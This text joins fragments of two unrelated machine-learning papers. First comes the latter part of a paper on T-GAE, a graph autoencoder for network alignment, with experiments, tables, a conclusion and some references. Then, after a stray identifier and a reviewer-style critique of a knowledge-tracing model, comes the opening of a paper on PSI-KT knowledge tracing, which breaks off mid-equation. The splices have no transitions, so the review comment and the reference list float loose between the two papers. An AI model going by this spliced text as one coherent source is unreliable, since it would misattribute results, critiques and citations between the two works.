| | Cora [Sen et al., 2008] | 2,708 | 5,278 | 5,278 | Citation Network |
| | Dblp [Fan et al., 2016] | 17,718 | 52,867 | 52,867 | Citation Network |
| | Coauthor CS [Chen et al., 2018] | 18,533 | 81,894 | 81,894 | Coauthor Network |
| Subgraph Matching | ACM-DBLP [Zhang & Tong, 2019] | 9,872 | 39,561 | 6,352 | Citation Network |
| | Douban Online-Offline [Zhang & Tong, 2016] | 3,906 | 1,632 | 1,118 | Social Network |

Table 2: Summary of dataset statistics.

### 4.4 ALIGNMENT AND COMPLEXITY ANALYSIS

After learning the powerful T-GAE node embeddings, network alignment is performed by solving the linear assignment problem in up to \(O(|\mathcal{V}|^3)\). An illustration of the assignment is presented in Fig. 2. The node features produced by T-GAE are used to calculate a pairwise distance matrix, followed by the greedy Hungarian algorithm to predict node correspondences. To analyze the complexity of our approach we study the 3 main parts of T-GAE: a) the design of the input structural features, b) the message-passing GNN that produces node embeddings, and c) the linear assignment algorithm.
The computation of our neighborhood-based structural features is expected to take \(O(|\mathcal{V}|)\) in real graphs, as proved in Henderson et al. (2011). The computational and memory complexities of the message-passing GNN are \(O(|\mathcal{V}|c^2 + |\mathcal{E}|c)\) and \(O(|\mathcal{V}|c)\), respectively, where \(c\) is the width of the GNN. The computational complexity of aligning the nodes of the graph is \(O(|\mathcal{V}|^2)\), since we use the suboptimal greedy Hungarian algorithm. If we want to optimally solve the linear assignment problem, we need to use the Hungarian algorithm, which has \(O(|\mathcal{V}|^3)\) complexity. If we want to process large graphs, we can embed the nodes in a 1-dimensional space and use a sorting algorithm with complexity \(O(|\mathcal{V}| \log(|\mathcal{V}|))\) to perform the linear assignment. Overall, the complexity of T-GAE is \(O(|\mathcal{V}|^2)\), or \(O(|\mathcal{V}|c^2 + |\mathcal{E}|c + |\mathcal{V}| \log(|\mathcal{V}|))\) for large graphs.

### 5 EXPERIMENTS

In this section, we evaluate the performance of the proposed framework on both graph and sub-graph alignment with various benchmark networks. We compare against several baselines and assess the performance of the competing methods in terms of matching accuracy, hit rate, and runtime.

#### 5.1 DATASETS AND BASELINES

Table 2 provides a brief overview of the considered networks. Our comparisons are conducted with 3 categories of baseline methods: (a) **GNN-based methods**: WAlign (Gao et al., 2021b), GAE and VGAE (Kipf & Welling, 2016a); (b) **Graph/node embedding techniques**: NetSimile (Berlingerio et al., 2013), Spectral (Umeyama, 1988), DeepWalk (Perozzi et al., 2014), Node2Vec (Grover & Leskovec, 2016b), GraphWave (Donnat et al., 2018) and LINE (Tang et al., 2015); (c) **Optimization-based graph matching algorithms**: S-GWL (Xu et al., 2019a), ConeAlign (Chen et al., 2020) and FINAL (Zhang & Tong, 2016). Note that LINE, VGAE, DeepWalk, and Node2Vec are omitted from some experiments since they show very poor performance. The reason behind that is that they are not permutation equivariant. GraphWave is also excluded from the sub-graph matching experiment, as it could not identify correlated nodes in two different graphs. In the case of graphs without attributes, FINAL is equivalent to the popular IsoRank (Singh et al., 2008) algorithm. FINAL is omitted in the sub-graph matching experiments due to weak performance.

5.2 Model Details

For the graph matching experiments, we consider graphs without node attributes and design the input to the GNN models using the 7 structural features proposed in (Berlingerio et al., 2013). The features include the degree of each node, the local and average clustering coefficients, and the number of edges, outgoing edges, and neighbors in each node's egonet. These input features are used for all GNN-based methods. As a result, the performance of NetSimile, vanilla GAE, and WAlign provides a measure to assess the benefit of using T-GAE for node embedding. As illustrated in Figure 1, the structure of our proposed encoder consists of two MLPs and a series of GNN layers. The node features are processed by a 2-layer MLP and passed to all the GNN layers. We add skip connections between this MLP layer and all the subsequent GNN layers. The outputs of all GNN layers are concatenated and passed to another 2-layer MLP, followed by a linear decoder to generate the reconstructed graph. The model is optimized end to end according to equation 10.
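A hedged PyTorch-style sketch of this end-to-end objective (equation 10) is given below. Here `encoder` stands for any GNN \( \phi \) mapping node features and a graph operator to embeddings, and `perturb` draws a perturbed adjacency \( \tilde{S} = S + M \); both names, like `tgae_loss`, are illustrative rather than the paper's exact API.

```python
import torch
import torch.nn.functional as F

def tgae_loss(encoder, graphs, perturb, num_perturbations=4):
    """Empirical version of the objective in equation 10: reconstruct each
    clean adjacency S_i (a dense float tensor) from the embeddings of its
    perturbed versions."""
    loss = 0.0
    for X, S in graphs:                            # expectation over the family S
        for _ in range(num_perturbations):         # expectation over M_i
            S_pert = perturb(S)                    # S~_i = S_i + M
            Z = encoder(X, S_pert)                 # phi(X; S~_i, H)
            logits = Z @ Z.T                       # logistic rho folded into the BCE
            loss = loss + F.binary_cross_entropy_with_logits(logits, S)
    return loss / (len(graphs) * num_perturbations)
```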
We test the performance of the proposed T-GAE framework by experimenting with three kinds of message-passing mechanisms on graphs, i.e., GCN (Kipf & Welling, 2016b), GIN (Xu et al., 2019b) and GNNc (described in Equation 11). These mechanisms correspond to different functions \( f \) and \( g \) in Equation 4. We report the performance of GIN in the main body and that of the others in Appendix G.

5.3 Graph Matching Experiments

To test the performance of the competing methods, we first attempt to match the graphs of Table 2 with permuted and perturbed versions of them. In particular, let \( G \) be a graph of Table 2 with adjacency matrix \( S \). For each graph we produce 10 permuted-perturbed versions according to \( \hat{S} = P(S + M)P^T \), where \( M \in \{-1, 0, 1\}^{N \times N} \) and \( P \) is a permutation matrix. For each perturbation level \( p \in \{0\%, 1\%, 5\%\} \), the total number of perturbations is defined as \( p|E| \), where \( |E| \) is the number of edges of the original graph. Every edge and non-edge then shares the same probability of being removed or added. We also conducted experiments where edges are removed according to the degrees of their vertices; results for that model are discussed in Appendix H.

5.3.1 Transferability Analysis

We first test the ability of T-GAE to perform large-scale network alignment and transfer across different datasets. To this end, we train T-GAE according to (9), where \( \mathcal{S} \) consists of the small-size networks, i.e., C. elegans, Arenas, Douban, and Cora. Then we resort to transfer learning and use the T-GAE encoder to produce node embeddings on (a) perturbed versions of C. elegans, Arenas, Douban, and Cora, and (b) larger graphs, i.e., Dblp and Coauthor CS. Note that neither the larger graphs nor the perturbed versions of the small graphs were considered during training. This is in contrast with all competing baselines, which are retrained on every testing graph pair. The average and standard deviation of the matching accuracy over 10 randomly generated perturbation samples are presented in Table 3. Our first observation is that for zero perturbation most algorithms are able to achieve a high level of matching accuracy. This is expected, since for zero perturbation network alignment is equivalent to graph isomorphism. Furthermore, there is a clear benefit to processing the NetSimile embeddings with GNNs, since they offer up to a 22% performance increase. When some perturbation is added, the conclusions are straightforward. Our proposed T-GAE markedly outperforms all the competing alternatives and shows the desired robustness to efficiently perform network alignment at the 1% perturbation level, and its performance is consistent across all datasets and perturbation levels. Regarding the ability of T-GAE to perform large-scale network alignment, the results are definitive. T-GAE enables low-complexity training with small graphs and execution at larger scales by leveraging transfer learning. In particular, it is able to achieve very high levels of matching accuracy for both Dblp and Coauthor CS for \( p = 0\% \) and \( p = 1\% \). To the best of our knowledge, this is the first attempt that performs exact alignment on networks on the order of 20k nodes and 80k edges. Comparing T-GAE with vanilla GAE, we observe that GAE is neither robust to noise nor transferable. This highlights the benefit of T-GAE in handling the distribution shift brought by the structural dissimilarity between different graphs. We also notice that S-GWL completely fails on the Arenas graph.
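To make the evaluation protocol of Sec. 5.3 concrete, here is a minimal sketch of generating one permuted-perturbed test pair and scoring a predicted correspondence. The uniform flipping over node pairs approximates "every edge and non-edge share the same probability of being removed or added"; the function names are illustrative.

```python
import numpy as np

def permuted_perturbed_pair(S, p, rng):
    """Draw S_hat = P (S + M) P^T with p * |E| random edge edits (Sec. 5.3)."""
    N = S.shape[0]
    num_edits = int(round(p * S.sum() / 2))    # |E| of the undirected graph
    S_tilde = S.astype(float).copy()
    iu, ju = np.triu_indices(N, k=1)
    picks = rng.choice(len(iu), size=num_edits, replace=False)
    for idx in picks:                          # flip: add a non-edge / remove an edge
        i, j = iu[idx], ju[idx]
        S_tilde[i, j] = S_tilde[j, i] = 1 - S_tilde[i, j]
    perm = rng.permutation(N)                  # ground truth: node a of S_hat <-> node perm[a] of S
    P = np.eye(N)[perm]
    return P @ S_tilde @ P.T, perm

def matching_accuracy(pred, perm):
    """Fraction of nodes mapped to their true counterparts."""
    return float(np.mean(np.asarray(pred) == perm))
```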
This happens because Arenas has isolated nodes, and S-GWL struggles to handle such graphs. To see this, we also test S-GWL on the Arenas graph after removing all the isolated nodes: it achieves 94.6 ± 0.5% matching accuracy at 0% perturbation, 28.7 ± 43.7% matching accuracy at 1% perturbation, and 37.4 ± 45.8% accuracy at 5% perturbation. The performance of S-GWL is also unstable across different noise levels, as removing edges may result in graphs with isolated nodes. Detailed runtime comparisons between T-GAE and all competing methods are presented in Appendix E.

Table 3: Graph matching accuracy on 10 randomly perturbed samples under different levels of edge editing. The proposed T-GAE is trained on the clean C. elegans, Arenas, Douban, and Cora networks, and tested on noisy versions of them and on the larger Dblp and Coauthor CS. We test 3 different message-passing mechanisms for the layers of T-GAE, as annotated in the table. Accuracy above 80% is highlighted in green, accuracy between 40% and 80% in yellow, and performance below 40% in red.

5.3.2 PERTURBED TRAINING

In the previous experiment, T-GAE is trained with a family of original graphs and tested on matching perturbed versions of a larger family of graphs. T-GAE exhibited more robust performance than the baseline methods; however, its matching accuracy dropped significantly as the perturbation level of the testing data increased. To tackle this problem, we follow a self-supervised learning approach and train T-GAE with a family of real graphs and perturbations of them. We train according to (10), which aims to produce similar node embeddings for both the original graphs and their perturbed versions. The data augmentation process follows the previously explained perturbation models. Similar to the previous experiment, we train over the four small datasets and execute over all datasets. Note that training and testing are performed with different perturbations of the original graphs. Table 4 reports the testing results of the best T-GAE when training is performed with graph perturbations.

| Algorithm | C. elegans | Arenas | Douban | Cora | Dblp | Coauthor CS |
|-----------|-----------|--------|--------|------|-------|-------------|
| 0% perturbation | | | | | | |
| T-GAE | 89.5 ± 1.3 | 88.4 ± 0.5 | 90.3 ± 0.4 | 87.4 ± 0.4 | 85.6 ± 0.1 | 97.6 ± 0.1 |
| T-GAE with pert. | 89.7 ± 1.5 | 88.6 ± 0.6 | 90.1 ± 0.4 | 87.4 ± 0.5 | 85.7 ± 0.2 | 97.7 ± 0.1 |
| 1% perturbation | | | | | | |
| T-GAE | 84.1 ± 1.1 | 84.8 ± 0.6 | 84.9 ± 0.6 | 82.9 ± 0.5 | 79.1 ± 0.4 | 86.5 ± 0.8 |
| T-GAE with pert. | 83.4 ± 1.6 | 85.6 ± 0.5 | 85.2 ± 0.6 | 83.2 ± 0.9 | 79.7 ± 0.4 | 87.1 ± 1.0 |
| 5% perturbation | | | | | | |
| T-GAE | 50.8 ± 3.3 | 47.1 ± 5.6 | 57.9 ± 6.1 | 58.2 ± 2.0 | 40.8 ± 2.1 | 26.9 ± 5.4 |
| T-GAE with pert. | 52.3 ± 5.4 | 62.6 ± 2.2 | 58.5 ± 5.0 | 57.4 ± 2.7 | 43.6 ± 3.7 | 30.4 ± 7.4 |

Table 4: Performance comparison of T-GAE when trained with/without perturbation.

We observe that incorporating graph perturbations in the training process helps significantly at high perturbation levels and benefits the robustness of the proposed method. On the other hand, when testing at low levels of perturbation, using the original graphs or their perturbations to train T-GAE does not lead to significant changes. In particular, at 5% testing perturbation, T-GAE achieves a 15.5% increase on the Arenas dataset, whereas at 0% and 1% testing perturbation the increase is 0.2% and 0.8%, respectively.
5.4 Sub-graph Matching Experiments

In this subsection, we test the performance of T-GAE in matching subgraphs of different networks that have aligned nodes (nodes that represent the same entities in different networks). For example, in the ACM-DBLP dataset, the task is to find and match the papers that appear in both citation networks, whereas in social networks like Douban Online-Offline, we aim to identify the users that take part in both online and offline activities. To this end, we test the performance of the proposed T-GAE framework on these datasets. We compare two different approaches. In the first, T-GAE is trained according to (9) to produce embeddings for the graph pair we aim to match, i.e., the ACM-DBLP pair or the Douban Online-Offline pair. In the second, T-GAE is trained according to (9) with C. elegans, Arenas, Douban, and Cora, and transfer learning is used to match the targeted graph pair. To assess the performance of the competing algorithms we measure the hit rate (Järvelin & Kekäläinen, 2000). The results are presented in Fig. 3. The execution times for the reported results are presented in Appendix F. We observe a significant improvement in matching accuracy with GNN-based methods compared to traditional graph or node embedding techniques. These results demonstrate the ability of GNNs to generate expressive and robust node embeddings compared to classical algorithms. In particular, our proposed framework, T-GAE, consistently achieves the best performance among all competing methods. This suggests that the training framework (10), illustrated in Fig. 1, provides an efficient approach to network alignment. It is also notable that T-GAE works well with both types of graph convolutions (GIN, GCN). This result indicates that the proposed framework has the potential to be extended to different types of neural networks.

Limitations: Although our approach achieves state-of-the-art performance in aligning real graphs, approaching network alignment with a learning method remains a heuristic and does not offer optimality guarantees. Furthermore, in order to process large graphs we cast network alignment as a self-supervised task. As a result, in small-scale settings where the task can be tackled with computationally intensive yet effective methods, our algorithm is not expected to perform the best. Finally, for large graphs the $O(|V|^2)$ complexity of T-GAE is limiting, and therefore our alternative method with complexity $O(|V|c^2 + |E|c + |V|\log(|V|))$ has to be employed.

6 Conclusion

We proposed T-GAE, a generalized transferable graph autoencoder to perform network alignment at a large scale. T-GAE can be trained with multiple graphs and produces robust and permutation-equivariant embeddings tailored to network alignment. The produced embeddings are related to the spectral decomposition of the graph and are at least as good in graph matching as certain spectral methods. The proposed approach leverages transfer learning and data augmentation and achieves high levels of matching accuracy for graphs with more than 15,000 nodes. Experiments with real-world benchmarks on both graph matching and subgraph matching tasks demonstrated the effectiveness and the limits of the proposed approach.

REFERENCES

Ralph Abboud, Ismail Ilkan Ceylan, Martin Grohe, and Thomas Lukasiewicz. The surprising power of graph neural networks with random node initialization. In IJCAI, 2021.

Kurt M Anstreicher and Nathan W Brixius. Solving quadratic assignment problems using convex quadratic programming relaxations.
Optimization Methods and Software, 16(1-4):49–68, 2001.

Michele Berlingerio, Danai Koutra, Tina Eliassi-Rad, and Christos Faloutsos. Network similarity via multiple social theories. In Proceedings of the 2013 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining, pp. 1439–1440, 2013.

Jiazhou Chen, Hong Peng, Guoqiang Han, Hongmin Cai, and Jiulun Cai. HOGMMNC: a higher order graph matching with multiple network constraints model for gene–drug regulatory modules identification. Bioinformatics, 35(4):602–610, July 2018. ISSN 1367-4803. doi: 10.1093/bioinformatics/bty662. URL https://doi.org/10.1093/bioinformatics/bty662.

Xiyuan Chen, Mark Heimann, Fatemeh Vahedian, and Danai Koutra. CONE-Align: Consistent network alignment with proximity-preserving node embedding. In Proceedings of the 29th ACM International Conference on Information & Knowledge Management, pp. 1985–1988, 2020.

D. Conte, P. Foggia, C. Sansone, and M. Vento. Graph matching applications in pattern recognition and image processing. In Proceedings 2003 International Conference on Image Processing (Cat. No.03CH37429), volume 2, pp. II–21, 2003. doi: 10.1109/ICIP.2003.1246606.

Jian Ding, Zongming Ma, Yihong Wu, and Jiaming Xu. Efficient random graph matching via degree profiles, 2020.

Claire Donnat, Marinka Zitnik, David Hallac, and Jure Leskovec. Learning structural node embeddings via diffusion wavelets. In Proceedings of the 24th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining. ACM, July 2018. doi: 10.1145/3219819.3220025. URL https://doi.org/10.1145/3219819.3220025.

Frank Emmert-Streib, Matthias Dehmer, and Yongtang Shi. Fifty years of graph matching, network alignment and network comparison. Information Sciences, 346:180–197, 2016.

Soheil Feizi, Gerald Quon, Mariana Recamonde-Mendoza, Muriel Medard, Manolis Kellis, and Ali Jadbabaie. Spectral alignment of graphs. IEEE Transactions on Network Science and Engineering, 7(3):1182–1197, 2019.

P. Gainza, F. Sverrisson, F. Monti, E. Rodolà, D. Boscaini, M. M. Bronstein, and B. E. Correia. Deciphering interaction fingerprints from protein molecular surfaces using geometric deep learning. Nature Methods, 17(2):184–192, February 2020.

Fernando Gama, Joan Bruna, and Alejandro Ribeiro. Stability properties of graph neural networks. IEEE Transactions on Signal Processing, 68:5680–5695, 2020.

Ji Gao, Xiao Huang, and Jundong Li. Unsupervised graph alignment with Wasserstein distance discriminator. In Proceedings of the 27th ACM SIGKDD Conference on Knowledge Discovery & Data Mining, pp. 426–435, 2021a.

Ji Gao, Xiao Huang, and Jundong Li. Unsupervised graph alignment with Wasserstein distance discriminator. In Proceedings of the 27th ACM SIGKDD Conference on Knowledge Discovery & Data Mining, KDD '21, pp. 426–435, New York, NY, USA, 2021b. Association for Computing Machinery. ISBN 9781450383325. doi: 10.1145/3447548.3467332. URL https://doi.org/10.1145/3447548.3467332.

Justin Gilmer, Samuel S Schoenholz, Patrick F Riley, Oriol Vinyals, and George E Dahl. Neural message passing for quantum chemistry. In International Conference on Machine Learning, pp. 1263–1272. PMLR, 2017.

Aditya Grover and Jure Leskovec. node2vec: Scalable feature learning for networks. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 855–864, 2016a.
NgaLU2fP5D
The assessment of the model's interpretability is not entirely convincing. The limited dimensionality of hidden learner representations in deep learning methods (e.g., DKT, AKT) at just 16 may constrain the neural networks' capabilities. Furthermore, there is no supporting evidence indicating that the learner representations of PSI-KT and these deep learning baselines capture the same underlying student features, making direct comparisons less rational.
PREDICTIVE, SCALABLE AND INTERPRETABLE KNOWLEDGE TRACING ON STRUCTURED DOMAINS Hanqi Zhou\textsuperscript{1,2,4}, Robert Bamler\textsuperscript{1,3}, Charley M. Wu\textsuperscript{1,2,3*}, & Álvaro Tejero-Cantero\textsuperscript{1,2*} \textsuperscript{1}University of Tübingen, \textsuperscript{2}Cluster of Excellence Machine Learning, \textsuperscript{3}Tübingen AI Center, \textsuperscript{4}IMPRS-IS \{hanqi.zhou, robert.bamler, charley.wu, alvaro.tejero\}@uni-tuebingen.de ABSTRACT Intelligent tutoring systems optimize the selection and timing of learning materials to enhance understanding and long-term retention. This requires estimates of both the learner’s progress (“knowledge tracing”; KT), and the prerequisite structure of the learning domain (“knowledge mapping”). While recent deep learning models achieve high KT accuracy, they do so at the expense of the interpretability of psychologically-inspired models. In this work, we present a solution to this trade-off. PSI-KT is a hierarchical generative approach that explicitly models how both individual cognitive traits and the prerequisite structure of knowledge influence learning dynamics, thus achieving interpretability by design. Moreover, by using scalable Bayesian inference, PSI-KT targets the real-world need for efficient personalization even with a growing body of learners and learning histories. Evaluated on three datasets from online learning platforms, PSI-KT achieves superior multi-step predictive accuracy and scalable inference in continual-learning settings, all while providing interpretable representations of learner-specific traits and the prerequisite structure of knowledge that causally supports learning. In sum, predictive, scalable and interpretable knowledge tracing with solid knowledge mapping lays a key foundation for effective personalized learning to make education accessible to a broad, global audience. 1 INTRODUCTION The rise of online education platforms has created new opportunities for personalization in learning, motivating a renewed interest in how humans learn structured knowledge domains. Foundational theories in psychology (Ebbinghaus, 1885) have informed spaced repetition schedules (Settles & Meeder, 2016), which exploit the finding that an optimal spacing of learning sessions enhances memory retention. Yet beyond the timing of rehearsals, the sequential order of learning materials is also crucial, as evidenced by curriculum effects in learning (Dewey, 1910; Dekker et al., 2022), where exposure to simpler, prerequisite concepts can facilitate the apprehension of higher-level ideas. Cognitive science and pedagogical theories have long emphasized the relational structure of knowledge in human learning (Rumelhart, 2017; Piaget, 1970), with recent research showing that mastering prerequisites enhances concept learning (Lynn & Bassett, 2020; Karuza et al., 2016; Brändle et al., 2022). Yet, we still lack a predictive, scalable, and interpretable model of the structural-temporal dynamics of learning that could be used to develop future intelligent tutoring systems. Here, we present PSI-KT, a novel approach for inferring interpretable learner-specific cognitive traits and a shared knowledge graph of prerequisite concepts. 
We demonstrate our approach on three real-world educational datasets covering structured domains, where our model outperforms existing baselines in terms of predictive accuracy (both within- and between-learner generalization), scalability in a continual learning setting, and interpretability of learner traits and prerequisite graphs. The paper is organized as follows: We first introduce the knowledge tracing problem and summarize related work (Sec. 2). We then provide a formal description of PSI-KT and describe the inference method (Sec. 3). Experimental evaluations are organized into demonstrations of prediction performance, scalability, and interpretability (Sec. 4). Altogether, PSI-KT bridges machine learning and cognitive science, leveraging our understanding of human learning to build the foundations for automated tutoring systems with broad educational applications. *Equal contribution. Code at github.com/mlcolab/psi-kt 2 BACKGROUND In this section, we begin by defining the knowledge tracing problem and then review related work. 2.1 KNOWLEDGE TRACING FOR INTELLIGENT TUTORING SYSTEMS For almost 100 years (Pressey, 1926), researchers have developed intelligent tutoring systems (ITS) to support human learning through adaptive teaching materials and feedback. More recently, knowledge tracing (KT; Corbett & Anderson, 1994) emerged as a method for tracking learning progress by predicting a learner’s performance on different knowledge components (KCs), e.g., the ‘Pythagorean theorem’, based on past learning interactions. Here, we focus on the KT problem, with the goal of supporting the selection of teaching materials in future ITS applications. In this setting, a learner \( \ell \) receives exercises or flashcards for KCs \( x^\ell_n \in \{0, 1, \ldots, K\} \) at irregularly spaced times \( t^\ell_n \), whereupon the performance is recorded, often as correct/incorrect, \( y^\ell_n \in \{0, 1\} \). We can formalize KT as a supervised learning problem on time-series data, where the goal of the KT model is to predict future performance (e.g., \( \hat{y}_{N+1} \)) given all or part of the interaction history \( H_{t^\ell_N} := \{x^\ell_n, t^\ell_n, y^\ell_n\}_{n=1}^N \) available up to time \( t^\ell_N \). As part of the process, a KT model may infer specific representations of learners or of the learning domain to help prediction. If these representations are interpretable, they can be valuable for downstream learning personalization. 2.2 RELATED WORK We broadly categorize related KT approaches into psychological and deep learning methods. Psychological methods. Focusing on interpretability, psychological methods use domain knowledge to describe the temporal decay of memory (e.g., forgetting curves; Ebbinghaus, 1885), sometimes also modeling learner-specific characteristics. Factor-based regression models use hand-crafted features based on learner interactions and KC properties (e.g., repetition counts and KC easiness; Pavlik Jr et al., 2009). While they model KC-dependent memory dynamics (Pavlik et al., 2021; Gervet et al., 2020; Lindsey et al., 2014; Lord, 2012; Ackerman, 2014), they ignore the relational structure between KCs. Half-life Regression (HLR; Settles & Meeder, 2016) from Duolingo uses both correct and incorrect counts, while the Predictive Performance Equation (PPE; Walsh et al., 2018) models the elapsed time of every past interaction with a power function to account for spacing effects. 
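As a concrete illustration of this family of factor-based models, below is a minimal sketch of the HLR recall curve, where predicted recall decays as \( 2^{-\Delta/h} \) with a learned half-life \( h = 2^{\theta \cdot x} \). The feature vector used here is an illustrative simplification; the full model of Settles & Meeder (2016) uses a richer feature set.

```python
import numpy as np

def hlr_recall(theta, n_correct, n_wrong, delta_days):
    """Half-life regression, simplified: recall = 2^(-Delta / h) with
    half-life h = 2^(theta . x). The features [bias, sqrt(correct),
    sqrt(wrong)] are an illustrative choice, not the paper's exact set."""
    x = np.array([1.0, np.sqrt(n_correct), np.sqrt(n_wrong)])
    half_life = 2.0 ** (theta @ x)            # in days
    return 2.0 ** (-delta_days / half_life)

# a learner with 5 correct and 1 incorrect recalls, 3 days after last practice
p = hlr_recall(theta=np.array([1.0, 0.5, -0.4]),
               n_correct=5, n_wrong=1, delta_days=3.0)
```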
By using shallow regression models with predefined features, these models achieve interpretability, but sacrifice prediction accuracy. Latent variable models use a probabilistic two-state Hidden Markov Model (Käser et al., 2017; Sao Pedro et al., 2013; Baker et al., 2008; Yudelson et al., 2013), representing either mastery or non-mastery of a given KC. These models are limited to binary states by design, do not account for learner dynamics, and, for some, their numerous parameters hinder scalability. Another probabilistic model, HawkesKT (Wang et al., 2021), accounts for structure and dynamics by modeling knowledge evolution as a multivariate Hawkes process. Close in spirit to our PSI-KT, this approach tracks KC structure but lacks any learner-specific representations.

Deep learning methods. Deep learning methods use flexible models with many parameters to achieve high prediction accuracy. However, this flexibility also makes it difficult to interpret their learned internal representations. The first deep learning methods explicitly modeled sequential interactions with recurrent neural networks to overcome the dependence on fixed summary statistics in simpler regression models, with Deep Knowledge Tracing (DKT; Piech et al., 2015) pioneering the use of Long Short-Term Memory (LSTM) networks (Hochreiter & Schmidhuber, 1997). A similar architecture, DKT-F (Nagatani et al., 2019), incorporated additional input features, whereas Shen et al. (2021) proposed an intricate modular architecture aimed at recovering interpretable learner representations, but neglecting KC relations. Structure-aware models leverage KC dependencies, accounting for the fact that human knowledge acquisition is structured by dependency relationships (i.e., concept maps; Hill, 2005; Koponen & Nousiainen, 2018; Lynn & Bassett, 2020). Tong et al. (2020) empirically estimate KC dependencies from the frequencies of successful transitions. AKT (Ghosh et al., 2020) relies on the attention mechanism (Vaswani et al., 2017) to implicitly capture structure (Pandey & Karypis, 2019; Choi et al., 2020; Shin et al., 2021; Liu et al., 2023), whereas GKT (Nakagawa et al., 2019) models it explicitly based on graph neural networks (Kipf & Welling, 2016). Recent work towards interpretable deep learning KT uses engineered features such as learner mastery and exercise difficulty (Minn et al., 2022), or infers them with neural networks (QIKT; Chen et al., 2023; IEKT; Long et al., 2021). While diverse approaches to interpretability exist (see Chen et al., 2023, for a review), a comprehensive evaluation framework is still lacking.

Figure 1: PSI-KT is a hierarchical probabilistic state-space model of learning. (a) Latent knowledge states for different KCs (colored curves) are inferred from observations. (b) Full hierarchical model for a single learner: cognitive traits $s_n$ control the coupled dynamics of states $z_n^k$, which give rise to observations $y_n$. (c) The dynamics combine memory decay (Eq. 6) and structural influences (Eq. 5).

Here, we present our predictive, scalable and interpretable KT model (PSI-KT) as a psychologically-informed probabilistic deep learning approach, together with a comprehensive evaluation framework for interpretability.

3 JOINT DYNAMICAL AND STRUCTURAL MODEL OF LEARNING

In this section, we describe PSI-KT, our probabilistic hierarchical state-space model of human learning (Fig. 1). Briefly, observations of learner performance $y$ (Fig.
1a, filled/unfilled boxes) provide indirect and noisy evidence about latent knowledge states $z$ (colored curves, with matching dots in Fig. 1b). These latent states evolve stochastically, in line with the psychophysics of memory (temporal decay in Fig. 1c), while simultaneously being subject to structural influences from performance on prerequisite KCs (structure in Fig. 1c). We introduce a second latent level of learner-specific traits $s$ (Fig. 1b, top), which govern the knowledge dynamics in an interpretable way.

Below, we describe the method in more detail. We start with the generative model (Sec. 3.1). Next, we discuss the joint approximate Bayesian inference of latent variables and estimation of generative parameters (Sec. 3.2). Finally, we show how to derive multi-step performance predictions (see Sec. 3.3 and Fig. 7 in Appendix A.4 for a graphical overview of inference and prediction).

3.1 PROBABILISTIC STATE-SPACE GENERATIVE MODEL

We conceptualize observations of learner performance as noisy measurements of an underlying time-dependent knowledge state, specific to each learner and KC. The evolution of knowledge states reflects the process of learning and forgetting, governed by learner-specific traits. Additionally, knowledge of different KCs informs one another according to learned prerequisite relationships. We translate these modeling assumptions into a generative model consisting of three main components: (i) the learner knowledge state across KCs, $z_n^\ell = [z_{n,1}^\ell, \ldots, z_{n,K}^\ell]^\top \in \mathbb{R}^K$ (colored curves in Fig. 1a), (ii) learner-specific cognitive traits $s_n^\ell \in \mathbb{R}^d$ (top row in Fig. 1b), and (iii) a shared static graph $A$ of KCs whose edges $a^{ik}$ quantify the probability for a KC $i$ to be a prerequisite for KC $k$ (Fig. 1c).

State-space model. State-space models (SSMs) are a framework for partially observable dynamical processes. They represent the inherent noise of measurements $y$ by an emission distribution $p(y_n | z_n)$, separate from the stochasticity of state dynamics, modeled as a first-order Markov process with transition probabilities $p(z_n | z_{n-1})$. The state dynamics are initiated by sampling from an initial prior $p(z_1)$ to iteratively feed the transition kernel, and predictions can be drawn at any time from the emission distribution. To represent the influence of individual cognitive traits over the knowledge dynamics, we additionally condition the $z$-transitions on the traits $s$ (which can also be observed only indirectly). The three-level SSM hierarchy of PSI-KT consists of:

Level 2 (latent cognitive traits):
$$s_n^\ell \sim p_\theta(s_n^\ell \mid s_{n-1}^\ell) := \mathcal{N}(s_n^\ell \mid H s_{n-1}^\ell, R) \tag{1}$$

Level 1 (latent knowledge states):
$$z_n^\ell \sim p_\theta(z_n^\ell \mid z_{n-1}^\ell, s_n^\ell) := \prod_k \mathcal{N}(z_{n,k}^\ell \mid m_{n,k}^\ell, w_n^\ell) \tag{2}$$

Level 0 (observed learner performance):
$$y_n^\ell \sim p(y_n^\ell \mid z_{n,k}^\ell) := \text{Bern}(\text{sigmoid}(z_{n,k}^\ell)), \quad k = x_n^\ell \tag{3}$$

The choice of Gaussian initial priors (discussed below) and Gaussian transitions ensures tractability, while the Bernoulli emissions model the observed binary outcomes. We now unpack this model and all its parameters in detail, starting with the knowledge dynamics.

Knowledge states \( z \). Recent KT methods (e.g., Nagatani et al., 2019) use an exponential forgetting function based on psychological theories (Ebbinghaus, 1885).
Here, we augment this approach by adding stable long-term memory (Averell & Heathcote, 2011), and model the knowledge dynamics \( z^\ell_k \) of an isolated KC \( k \) as a mean-reverting stochastic (Ornstein-Uhlenbeck; OU) process:

\[ \mathrm{d}z^\ell_k / \mathrm{d}t = \alpha^\ell (\mu^\ell - z^\ell_k) + \sigma^\ell \eta(t). \tag{4} \]

Accordingly, the state of knowledge \( z^\ell_k \) gradually reverts to a long-term mean \( \mu^\ell \) with rate \( \alpha^\ell \), subject to white-noise fluctuations \( \eta(t) \) scaled by volatility \( \sigma^\ell \). To account for the influence of other KCs, we adjust the mean \( \mu^\ell_n \) using prerequisite weights \( a^{ik} \) (defined in Eq. 7 below), modulated by the learner’s transfer ability \( \gamma^\ell_n \):

\[ \tilde{\mu}^\ell_{n,k} := \mu^\ell_n + (\gamma^\ell_n / K) \sum_{i \neq k} a^{ik} z^\ell_{n-1,i}. \tag{5} \]

We obtain the mean \( m^\ell_{n,k} \) and variance \( w^\ell_n \) of the transition kernel in Eq. 2 by marginalizing the OU process over one time step \( \tau^\ell_n := t^\ell_n - t^\ell_{n-1} \), which can be done analytically (Särkkä & Solin, 2019):

\[ m^\ell_{n,k} = r^\ell_n z^\ell_{n-1,k} + (1 - r^\ell_n) \tilde{\mu}^\ell_{n,k}, \quad \text{with retention ratio } r^\ell_n := e^{-\alpha^\ell_n \tau^\ell_n} \in (0, 1), \tag{6} \]

